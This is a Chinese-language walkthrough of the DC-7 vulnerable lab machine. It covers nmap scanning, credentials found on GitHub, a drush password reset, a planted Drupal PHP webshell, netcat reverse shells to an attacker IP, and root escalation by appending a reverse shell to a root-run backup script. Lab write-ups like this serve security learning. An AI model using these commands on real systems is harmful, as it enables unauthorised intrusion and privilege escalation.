一、信息收集
查看靶机的ip

//进行常规nmap扫描
nmap -sT --min-rate 10000 -p- 192.168.179.155
nmap -sT -sV -sC -O -p22,80 192.168.179.155
nmap --script-vuln -p22,80 192.168.179.155

打开80端口发现有搜索框和登录框


根据提示，暴力破解或许不会成功。
搜寻了好久都没有头绪，在GitHub搜索DC7USER尝试找到一些提示，成功找到账号密码

dc7user
MdR3xOgB7#dW

尝试用它登录
ssh成功连入

查看是否有可利用信息

cat /opt/scripts/backups.sh

查阅资料了解drush可以用命令行操作的形式管理Drupal站点
通过drush来修改admin的密码

drush upwd admin --password="key"

显示未修改成功，要在登录页面的路径下修改密码

修改成功，尝试登录
由于前面尝试爆破后限制了登录，重装了靶机，靶机ip变为192.168.1.104
成功登录

在add content模块中尝试写入一句话木马，但是不生效，查阅发现drupal8为了安全，需要自行导入php模块，在extend模块中下载

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

下载后要激活php模块

尝试写入一句话木马

用蚁剑进行连接

连接成功，kali端监听，虚拟终端反弹shell

提权

nc -lvnp 6666
nc -e /bin/bash 192.168.179.141 6666
python -c 'import pty;pty.spawn("/bin/bash")' //提高bash的交互性

拿到www-root权限后，我们就有了对 /opt/scripts/backups.sh的写操作权限了。
尝试写入反弹shell

echo "nc -e /bin/bash 192.168.179.141 7777" >> /opt/scripts/backups.sh

kali端进行端口监听即可拿到root权限（等待时间有点长）

总结：
1、进入80端口后查看提示，使用爆破无法破解，尝试在网页搜索DCUSER7来获取信息，成功拿到ssh的账号密码，进行连接
2、在dcuser7的下查看backups.sh文件后，通过查阅得知可以通过drush来修改用户密码（要在此目录下进行操作，否则不生效），修改admin密码后直接登入。
3、在admin界面查看是否有文件上传的地方给我们传入一句话木马，发现它没有开启php模块，需要我们导入php模块后启用才可以传入php代码
4、传入一句话木马后使用蚁剑连接，再反弹shell回kali
5、拿到www-root权限后，直接向backups.sh中写入nc -e /bin/bash 192.168.179.141 7777 反弹shell，kali端监听即可拿到shell